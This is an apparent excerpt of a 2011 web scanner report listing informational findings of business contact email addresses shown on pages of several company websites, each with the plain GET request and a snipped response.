Date: Mon, 25 Apr 2011 14:20:49 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Mon, 01 Nov 2010 19:25:45 GMT
ETag: "be2e6-1096-49402c652c040"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
27.17. http://tools.manageengine.com/forums/me/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/me/forum.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forums/me/forum.php?limit=5&char=25 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/meforum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51202

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>body{}
.forumTitle{float:left;margin-top:-12px;padding-left:10px;font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:22px;t
...[SNIP]...
<a href='mailto:opmanger-support@manageengine.com' target='_blank'>opmanger-support@manageengine.com<\/a>
...[SNIP]...
<a href='mailto:opmanager-support@manageengine.com' target='_blank'>opmanager-support@manageengine.com<\/a>
...[SNIP]...
<a href='mailto:nfs@manageengine.com' target='_blank'>nfs@manageengine.com<\/a>
...[SNIP]...
27.18. http://tools.manageengine.com/forums/security-manager/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/security-manager/forum.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forums/security-manager/forum.php?limit=5&char=25 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/security-manager-forum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64425

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body
{
}
.forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:
...[SNIP]...
<a href='mailto:Support@servicedeskplus.com' target='_blank'>Support@servicedeskplus.com<\/a>
...[SNIP]...
<a href='mailto:securitymanagerplus-support@manageengine.com' target='_blank'>securitymanagerplus-support@manageengine.com<\/a>
...[SNIP]...
27.19. http://www.criticalwatch.com/company/critical-watch-career.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/critical-watch-career.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /company/critical-watch-career.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-security.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:32 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:employment@criticalwatch.com" class="content_menulink"><img src="../images/email.gif" width="40" height="38" align="absmiddle" />employment@criticalwatch.com</a>
...[SNIP]...
27.20. http://www.criticalwatch.com/company/critical-watch-contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/critical-watch-contact.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /company/critical-watch-contact.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-career.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:34 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 14936


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<a href="mailto:info@criticalwatch.com" class="content_menulink">info@criticalwatch.com</a>
...[SNIP]...
27.21. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /products/vulnerability-management-ips.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /products/vulnerability-management-ips.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/mssp.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:06 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 13783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:tippingpoint@criticalwatch.com" class="color-gold">tippingpoint@criticalwatch.com</a>
...[SNIP]...
27.22. http://www.criticalwatch.com/support/critical-watch-support.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /support/critical-watch-support.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /support/critical-watch-support.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmb=164981229; __utmc=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 12:54:43 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="mailto:support@criticalwatch.com" class="content_menulink">support@criticalwatch.com</a>
...[SNIP]...
27.23. http://www.customermagnetism.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=5640f44c05a437bcbee56d65bbd77ffb; path=/
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 28700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Engine
...[SNIP]...
<a href="mailto:sales@trycm.com ">sales@trycm.com </a>
...[SNIP]...
27.24. http://www.customermagnetism.com/case-studies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /case-studies/

Issue detail

The following email address was disclosed in the response:

Request

GET /case-studies/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.1.10.1303747424; __support_check=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 31470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<a href="mailto:sales@trycm.com ">sales@trycm.com </a>
...[SNIP]...
27.25. http://www.customermagnetism.com/free-consultation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /free-consultation/

Issue detail

The following email address was disclosed in the response:

Request

GET /free-consultation/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/pay-per-click-services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __support_check=1; __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.4.10.1303747424

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Expires: Mon, 25 Apr 2011 16:23:43 GMT
Vary: Accept-Encoding
Pragma: no-cache
Content-Type: text/html
Content-Length: 22442


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<a href="mailto:sales@trycm.com ">sales@trycm.com </a>
...[SNIP]...
27.26. http://www.customermagnetism.com/pay-per-click-services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /pay-per-click-services/

Issue detail

The following email address was disclosed in the response:

Request

GET /pay-per-click-services/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __support_check=1; __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.3.10.1303747424

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<a href="mailto:sales@trycm.com ">sales@trycm.com </a>
...[SNIP]...
27.27. http://www.customermagnetism.com/seo-faq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /seo-faq/

Issue detail

The following email address was disclosed in the response:

Request

GET /seo-faq/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.1.10.1303747424; __support_check=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<a href="mailto:sales@trycm.com ">sales@trycm.com </a>
...[SNIP]...
27.28. http://www.depthsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.depthsecurity.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?gclid=CKbh46DPt6gCFcQSNAodRgFuBQ HTTP/1.1
Host: www.depthsecurity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303732840.1.1.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303732840.1; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6045
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 12:52:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Depth
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...
27.29. http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.depthsecurity.com
Path:   /issa-kc-12-2009-presentation.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /issa-kc-12-2009-presentation.aspx HTTP/1.1
Host: www.depthsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.depthsecurity.com/?gclid=CKbh46DPt6gCFcQSNAodRgFuBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.1.10.1303735972

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6488
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:10:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...
27.30. https://www.depthsecurity.com/company.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /company.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /company.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5736
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...
27.31. https://www.depthsecurity.com/contact-us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /contact-us.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /contact-us.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11987
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:10:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
</h3>
info@depthsecurity.com
</div>
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...
27.32. https://www.depthsecurity.com/professional-services.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /professional-services.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /professional-services.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/services.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6397
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
...[SNIP]...
27.33. https://www.depthsecurity.com/services.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /services.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /services.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/company.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6794
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
<a href="mailto:info@depthsecurity.com ">info@depthsecurity.com</a>
